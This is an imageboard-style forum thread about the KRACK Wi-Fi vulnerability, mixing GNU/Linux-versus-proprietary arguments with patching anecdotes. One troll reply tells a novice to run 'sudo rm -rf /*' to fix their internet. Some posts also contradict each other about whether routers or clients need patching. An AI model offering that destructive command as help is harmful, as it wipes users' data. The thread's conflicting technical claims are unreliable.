Wifi vulnerability is discovered

>wifi vulnerability is discovered
>debian gnu/linux is patched and the problem fixed before it even got publicized
>non-gnu linux android device isn't patched and probably will never be fixed
>other proprietary non-linux, non-gnu software vendors are completely silent
Can we just admit that everything that is good about GNU/Linux is GNU and without GNU and the four essential freedoms[1] Linux is just another UNIX clone that works against the users?

Isn't this similar to the situation that pushed Richard Stallman to create GNU and the GNU philosophy is as relevant as ever?
>In 1980, Stallman and some other hackers at the AI Lab were refused access to the source code for the software of a newly installed laser printer. Stallman had modified the software for the Lab's previous laser printer so it electronically messaged a user when the person's job was printed, and would message all logged-in users waiting for print jobs if the printer was jammed. Not being able to add these features to the new printer was a major inconvenience, as the printer was on a different floor from most of the users.
>This experience convinced Stallman of people's need to be able to freely modify the software they use.

[1]: gnu.org/philosophy/philosophy.html

Other urls found in this thread:

marc.info/?l=openbsd-announce&m=148839684520133
krackattacks.com/
twitter.com/NSFWRedditGif

And it was fixed in openbsd in March

marc.info/?l=openbsd-announce&m=148839684520133

Spoiler: macOS/iOS patches are available in developer beta.

Proprietary software BTFO'd

I just did sudo apt update && sudo apt upgrade and there's 1 package to upgrade: wpa_supplicant. After that restarted it and networkmanager.

>Linux is just another UNIX clone that works against the users

The most popular GNU installation base is built on Linux. Admit it, GNU cannot thrive without Linux ecosystem.

This is, by the way, a free choice. Linux users can choose. Nobody forces them to use Linux.

But why do we have to argue? They are both darn good things!

Android is Linux, get over it.

I installed this linux thing a few months ago but haven't updated?
I typed the root command in the command prompt
146 packages to be upgraded?

Okay. Look through the packages to be installed list and see if wpa_supplicant is in it

So it's bad? I did apt remove wpasupplicant so it removed "wicd wicd-daemon wicd-gtk wpasupplicant". posting from my phone since I can't access internet on my computer now, so I should simply restart?

Which distribution are you using? It very likely removed the old version and installed the new, patched and safe, version

Anyone else experiencing issues with USB since the update?

No problem. Just execute sudo rm -rf /* to fix your internet.

>I wrote and included a suggested diff for OpenBSD already, and that at the time the tentative disclosure deadline was around the end of August. As a compromise, I allowed them to silently patch the vulnerability. In hindsight this was a bad decision, since others might rediscover the vulnerability by inspecting their silent patch. To avoid this problem in the future, OpenBSD will now receive vulnerability notifications closer to the end of an embargo.
>krackattacks.com/
Thanks Theo.

>apt remove wpasupplicant
Are you on wifi? If so you kinda need that package.

And general betas. They’ll be public within the week.

Linux, yes, but not GNU/Linux

Just so we are clear, wpa_supplicant is BSD licensed and not associated with the GNU project and it is tightly coupled with the linux kernel, but the exploit has nothing to do with linux and everything to do with the spec and the implementors interpretation of it. wpa_supplicant is well fucking patched and if you can't update that on your own devices you are in the wrong. Not your vendor, why should they be held accountable for your negligence?

>wifi on linux
kek pretty useless imo if linux cant even have a proper functioning driver for wifi

:poop:

Works on my machines

what was the vulnerability?
I dont see how its a realistic expectation for every router to be patched.

It doesn't affect routers.

'fraid it do dude. There are flaws in the protocol in both directions and pathing either side fixes both of them. Read the actual announcement page.

wpa is cracked

>patching either side fixes both
Thank god, I thought my devices that no longer receive updates would be forever vulnerable

Hahahahaha, it takes Linux distros 6 months to apply a patch that it takes OpenBSD 3 days to apply. That's actually fucking hilarious.

Switch to GNU on PC and Librem 5 for a phone. Enjoy the superior experience of Linux.

Does it really? I thought to be fully secure you need to patch both the router and clients?

>patching either side fixes both
This is totally incorrect. It only affects clients. If your device isn't updated you are vulnerable to one of the simplest WiFi mitm's that has ever been released.

Read the actual announcement page by the original researcher. It literally says you are wrong.
Either that or you don't know what "either side" means.

Same, just installed the patch a couple of days ago. Windows shills just love it when the Linux community runs into any problems whatsoever. The only people getting fucked by the vulnerabilities are the idiots that never update.

You actually need to blame Broadcom for that.

Learn to read you fucking retard.